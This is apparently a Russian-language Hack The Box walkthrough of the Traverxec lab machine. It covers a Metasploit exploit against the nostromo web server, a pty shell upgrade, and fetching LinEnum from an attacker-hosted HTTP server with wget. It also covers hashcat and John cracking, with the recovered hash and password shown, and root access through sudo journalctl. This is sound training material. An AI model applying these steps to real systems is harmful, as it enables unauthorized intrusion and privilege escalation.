###### tags: `HTB` https://app.hackthebox.com/machines/217 # **Hack the Box: Travexsec** Сканируем хост nmap -sV -sC --script vulners 10.10.10.165  Обращаем внимание, что на 80 порту есть веб-сервер nostromo v 1.9.6 в msfconsole ищем search nostromo Есть эксплойт на исполнение произвольного кода. Эксплуатируем уязвимость получаем сессию с правами www-data  Осматриваемся есть пользователь david, его uid 1000. Давайте повысим привелегии: Для удобства апгрейдим терминал: python2 -c 'import pty;pty.spawn("/bin/bash")' Для дальнейших действий давайте запустим скрипт енумирации линукс (https://github.com/rebootuser/LinEnum) Качаем его, поднимаем в папке куда скачали python3 -m http.server Переносим на машину жертвы - wget http://10.10.10.14:8000/LinEnum.sh chmod +x LinEnum.sh && ./LinEnum.sh > scan.txt less scan.txt -->  Что мы видим? есть хеш Давида, давайте его сбрутим хешкатом! *`1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/`* > traversec.hash Проверим тип хеша https://hashcat.net/wiki/doku.php?id=example_hashes hashcat -m 500 traversec.hash /usr/share/wordlists/rockyou.txt Получили пароль Nowonly4me При попытке логина с этим паролем не пускает. Ищем дальше Давайте посмотрим настройки веб серверва в /var/nostromo/conf/nhttpd.conf  Есть папка public_www Посмотрим что есть в этой папке:  Есть интересный файл бекапа, давайте его скачаем: На атакующей машине:  На жертве:  tar -xzvf backup-ssh-identity-files.tar ПРи попытке авторизации по этим ключам , видим что закрытый ключ запаролен  ДАвайте его сбрутим Джоном: Делаем хеш из рса файла, брутим по стандартному вордлисту:  Получили пользователя:  ДАвайте попробуем подняться до рута:  У Дэвида есть в папке бин 2 файла, и что интересно, с правами судо запускается journalctl (https://gtfobins.github.io/gtfobins/journalctl/) Берем в конце файла строку с запуском сервиса, запускаем ее, после запуска у нас откроется less, и введя !/bin/sh мы получаем рута